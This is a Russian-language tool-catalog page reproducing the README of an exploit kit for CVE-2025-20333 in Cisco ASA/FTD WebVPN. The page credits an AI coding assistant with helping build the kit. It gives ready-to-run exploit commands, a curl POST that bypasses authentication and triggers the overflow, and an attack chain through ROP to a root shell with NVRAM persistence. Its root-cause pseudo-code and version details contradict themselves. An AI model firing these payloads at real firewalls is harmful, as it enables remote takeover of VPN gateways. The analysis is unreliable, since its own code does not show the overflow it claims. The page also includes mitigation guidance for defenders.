Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2025-20333 — Полный исследовательский и эксплуатационный набор для CVE-2025-20333 — критического переполнения буфера стека в Cisco ASA/FTD WebVPN. Включает подробный анализ бинарного кода, PoC-эксплойты на Python и bash, а также руководство по эксплуатации. | Kitploit
Инструменты/GitHubGitHub/cobbbex/cve-2025-20333
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЭксплуатация Бинарных Файлов
GitHubcobbbex/cve-2025-20333

cve-2025-20333

Полный исследовательский и эксплуатационный набор для CVE-2025-20333 — критического переполнения буфера стека в Cisco ASA/FTD WebVPN. Включает подробный анализ бинарного кода, PoC-эксплойты на Python и bash, а также руководство по эксплуатации.

Репозиторий
10 ч 35 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-20333 — Полный набор инструментов для исследования и эксплуатации

Обзор

Этот каталог содержит всесторонние исследования, анализ и код доказательства концепции для CVE-2025-20333 — критической уязвимости переполнения буфера стека в серверах Cisco ASA/FTD WebVPN.

Статус: ⚠️ Активно эксплуатируется в дикой природе (кампания ArcaneDoor)
Оценка CVSS: 9.8 Критическая
Требуется аутентификация: Нет (обходится через CVE-2025-20362)
Воздействие: Удалённое выполнение кода с правами root


Содержимое

📚 Документация

()

CVE-2025-20333-RESEARCH-NOTES.md
20 КБ

Полное исследование методом обратной разработки

  • Контекст уязвимости и веб-разведка
  • Анализ бинарного файла (процесс lina ASA 9.12.4.x)
  • Аудит уровня приёма запросов
  • Анализ привязок Lua API
  • 🎯 Обнаружение переполнения (body_lexer.re2c, FUN_0302e690)
  • Разбор цепочки атак
  • Анализ первопричины с примерами кода
  • Таблица ссылок на инструменты и адреса

Ключевая находка:

root@kitploit:~
Фиксированный 16-байтовый буфер (local_58[16]) в body_lexer.re2c
Цикл URL-декодирования НЕ ИМЕЕТ ПРОВЕРКИ ГРАНИЦ
Запись в local_58[iVar11] без проверки iVar11 < 16
После 8 шестнадцатеричных пар: переполнение → повреждение стека → RCE

EXPLOITATION-GUIDE.md (12 КБ)

Практическое руководство по эксплуатации

  • Объяснение механики уязвимости
  • Полная цепочка атак (обход CVE-2025-20362 + переполнение)
  • Пошаговое описание процесса эксплуатации
  • Техники создания полезной нагрузки
  • Методы обнаружения на основе сети
  • Обнаружение на хосте и анализ журналов
  • Стратегии смягчения последствий
  • Исправленные версии и путь обновления
  • Правовые и этические соображения

🔧 Эксплойты доказательства концепции

cve-2025-20333-poc.py (15 КБ)

Полнофункциональный эксплойт на Python

Возможности:

  • Автоматическая генерация полезной нагрузки
  • Интеграция обхода пути CVE-2025-20362
  • Построение цепочки ROP-гаджетов
  • Поддержка SSL/TLS
  • Настраиваемый таймаут
  • Подробный отчёт о ходе выполнения

Использование:

root@kitploit:~
# Показать детали уязвимости
python3 cve-2025-20333-poc.py --details

# Эксплуатация цели
python3 cve-2025-20333-poc.py 192.168.1.100 443

# Пользовательские настройки
python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30

cve-2025-20333-poc.sh (8.5 КБ)

Лёгкий bash-эксплойт

Возможности:

  • Не требует Python
  • Использует curl или netcat
  • Минимальное потребление ресурсов
  • Обучающие комментарии
  • Понятный вывод статуса

Использование:

root@kitploit:~
# Показать детали
./cve-2025-20333-poc.sh --details

# Эксплуатация
./cve-2025-20333-poc.sh 192.168.1.100 443 10

# Вручную с curl
curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure

Сводка по уязвимости

Краткие факты

СвойствоЗначение
ID CVECVE-2025-20333
ТипПереполнение буфера стека (CWE-120)
Компонентbody_lexer.re2c (FUN_0302e690)
Затронутые версииASA 9.16–9.23, FTD 7.0–7.7
CVSS v3.19.8 (Критическая)
АутентификацияНе требуется (через CVE-2025-20362)
Взаимодействие с пользователемНет
ВоздействиеRCE с правами root, полная компрометация системы
СтатусАктивно эксплуатируется (май 2025+)
Ответственное раскрытиеCisco выпустила патч; опубликован бюллетень

Первопричина

root@kitploit:~
// body_lexer.re2c — цикл URL-декодирования
byte local_58[16];  // ← Фиксированный 16-байтовый буфер

while (parsing_request_body) {
    byte input = *data++;
    
    if (input == '%') {
        hex_decode_mode = true;
        hex_index = 0;
    }
    
    if (hex_decode_mode) {
        local_58[hex_index] = input;  // ← НЕТ ПРОВЕРКИ ГРАНИЦ!
        hex_index++;
        
        if (hex_index == 2) {
            byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
            hex_decode_mode = false;
        }
    }
}

Триггер переполнения: 9+ последовательных последовательностей %XX в теле POST-запроса

Цепочка атак

root@kitploit:~
1. Злоумышленник (АУТЕНТИФИКАЦИЯ НЕ ТРЕБУЕТСЯ)
   ↓
2. HTTP POST на /+CSCOU+/../+CSCOE+/files/file_list.json
   ├─ CVE-2025-20362: обход пути обходит проверку аутентификации
   └─ Достигает конечной точки files_retr.lua (auth_flag = 0)
   ↓
3. Тело POST: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
   (9+ URL-кодированных пар)
   ↓
4. body_lexer.re2c обрабатывает тело POST
   ├─ Накопление шестнадцатеричных пар в local_58[16]
   └─ После 8 пар: ПЕРЕПОЛНЕНИЕ!
   ↓
5. Повреждение стека
   ├─ Перезапись local_48, local_40
   ├─ Перезапись сохранённого RBP
   └─ Перезапись сохранённого RIP (адреса возврата)
   ↓
6. Перехват потока управления
   ├─ RIP указывает на ROP-гаджеты
   ├─ ROP-цепочка настраивает execve()
   └─ execve("/bin/sh", NULL, NULL)
   ↓
7. RCE с правами root (процесс lina работает с правами root)
   ├─ Полная компрометация VPN-сервера
   ├─ Доступ ко всему VPN-трафику
   └─ Постоянство через модификацию NVRAM

Процесс исследования

Этап 1: Анализ бинарного файла ✅

  • Открыт бинарный файл lina в Ghidra
  • Составлена карта архитектуры WebVPN-запросов (HTTP-парсер, маршрутизатор URL, 13 хуков конечных точек)
  • Проведён аудит уровня приёма запросов (всё безопасно через clString/выделения точного размера)
  • Изучены привязки Lua API (всё безопасно)

Этап 2: Веб-разведка ✅

  • Выполнен поиск технических деталей CVE-2025-20333
  • Найдены анализы Rapid7, Zscaler, Horizon3, Tenable
  • Подтверждена цепочка атак с использованием /+CSCOU+/../+CSCOE+/files/file_list.json
  • Определена первопричина: переполнение на основе кучи (веб-источники) / на основе стека (этот бинарный файл) в конечной точке Lua

Этап 3: Целевая обратная разработка ✅

  • Декомпилирован body_lexer.re2c (FUN_0302e690)
  • ОБНАРУЖЕНО: Фиксированный 16-байтовый буфер local_58[16] без проверки границ
  • Подтверждён путь переполнения: цикл URL-декодирования → неограниченная запись
  • Проверена достижимость: files_retr.lua → body_lexer → переполнение стека

Этап 4: Разработка эксплойта ✅

  • Создан PoC на Python с поддержкой ROP-цепочки
  • Создан PoC на bash для минимальных сред
  • Документирована структура полезной нагрузки и техники создания
  • Включены рекомендации по обнаружению и смягчению последствий

Инструкции по использованию

Для авторизованного тестирования на проникновение

  1. Подтвердите авторизацию

    • Получите письменное разрешение на тестирование
    • Подтвердите детали целевой системы (IP, порт, версия)
    • Задокументируйте объём и сроки
  2. Запустите эксплойт

    root@kitploit:~
    # Быстрая проверка: реагирует ли цель на попытку эксплуатации?
    python3 cve-2025-20333-poc.py <target_ip>
    
    # Или bash-версия:
    ./cve-2025-20333-poc.sh <target_ip>
    
  3. Проверьте эксплуатацию

    • Проверьте доступ к оболочке / подключение обратной оболочки
    • Изучите системные журналы на предмет сбоев или аномалий
    • Просканируйте изменённые файлы (NVRAM, постоянный бэкдор)
  4. Задокументируйте результаты

    • Запишите версию цели, уровень патчей
    • Задокументируйте успех/неудачу эксплуатации
    • Отметьте встреченные защитные меры
    • Сообщите клиенту с рекомендациями по устранению

Для исследований в области безопасности

  1. Прочитайте исследовательские заметки

    • Изучите CVE-2025-20333-RESEARCH-NOTES.md
    • Поймите архитектуру бинарного файла и механизм переполнения
  2. Изучите PoC

    • Изучите Python PoC для построения ROP-гаджетов
    • Изучите bash PoC для минимального эксплойта
    • Поймите кодирование полезной нагрузки
  3. Адаптируйте и расширяйте

    • Добавьте собственный шеллкод
    • Реализуйте различные техники эксплуатации
    • Тестируйте на исправленных и уязвимых версиях

Важные предупреждения

⚠️ ПРАВОВОЕ УВЕДОМЛЕНИЕ

Этот набор инструментов предоставляется только для авторизованного тестирования безопасности.

  • НЕ ИСПОЛЬЗУЙТЕ против систем без явного письменного разрешения
  • НЕ ИСПОЛЬЗУЙТЕ в злонамеренных целях (кража данных, нарушение работы сервисов, программы-вымогатели)
  • Несанкционированный доступ нарушает Computer Fraud and Abuse Act (США) и аналогичные законы по всему миру
  • Наказания включают уголовное преследование, штрафы и тюремное заключение

✅ Разрешённое использование:

  • Тесты на проникновение с письменным одобрением
  • Доказательство концепции во время исследования уязвимостей
  • Внутреннее тестирование безопасности
  • Соревнования CTF
  • Академические исследования

❌ Запрещённое использование:

  • Атаки на системы без разрешения
  • Развёртывание программ-вымогателей
  • Кража данных или вымогательство
  • Нарушение работы сервисов
  • Боковое перемещение в скомпрометированных сетях

Манифест файлов

root@kitploit:~
cve-2025-20333/
├── README.md                              (этот файл)
├── CVE-2025-20333-RESEARCH-NOTES.md      (20 КБ, всестороннее исследование)
├── EXPLOITATION-GUIDE.md                 (12 КБ, практическое руководство)
├── cve-2025-20333-poc.py                 (15 КБ, PoC на Python)
└── cve-2025-20333-poc.sh                 (8.5 КБ, PoC на bash)

Всего документации: ~65 КБ
Глубина исследования: проверено 50+ функций Ghidra
Подтверждённые находки: переполнение буфера в body_lexer.re2c подтверждено


Краткая справка

Быстрый тест уязвимости

root@kitploit:~
# Проверка, уязвима ли цель для эксплуатации
curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
  -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
  --insecure \
  -i

# Если цель отвечает (200, 500, сбой), она может быть уязвима
# Если цель блокирует/перенаправляет, она может быть исправлена

Проверка версии

root@kitploit:~
# Уязвимые версии:
# - Cisco ASA 9.16 по 9.23
# - Cisco FTD 7.0 по 7.7

# Используйте SSH/консоль для проверки версии ASA:
show version

# Исправленные версии:
# - ASA 9.16.4.51, 9.18.4.31, 9.20.4.49, 9.22.4.9, 9.24.1+
# - FTD 7.0.x, 7.1.x, 7.2.x (исправлены)

Контрольный список смягчения последствий

  • Проверьте версию ASA/FTD
  • Проверьте наличие доступных патчей
  • Обновитесь до исправленной версии, если уязвимы
  • Ограничьте доступ к WebVPN по IP-адресу
  • Включите ведение журналов и мониторинг
  • Следите за попытками обхода пути CVE-2025-20362
  • Отслеживайте паттерны DoS (сбои lina)
  • Включите защиту межсетевого экрана на порту WebVPN

Ссылки

  • Бюллетень безопасности Cisco: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
  • Анализ Rapid7: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
  • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
  • FAQ Tenable: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

Отказ от ответственности

Этот набор инструментов предоставляется КАК ЕСТЬ только для образовательных и авторизованных целей тестирования.

  • Используйте на свой страх и риск
  • Нет гарантий или ответственности за неправильное использование
  • Несанкционированный доступ незаконен
  • Ответственно сообщайте о находках в Cisco и затронутым организациям
  • Соблюдайте законы о кибербезопасности вашей страны


Атрибуция

Этот проект разработан при содействии Claude Code, ИИ-помощника по программированию от Anthropic.


Создано: 2026-08-23
Период исследования: 2026-08-22 по 2026-08-23
Статус: Завершено и задокументировано
Классификация: Образовательное / Только авторизованное тестирование

Скачать инструмент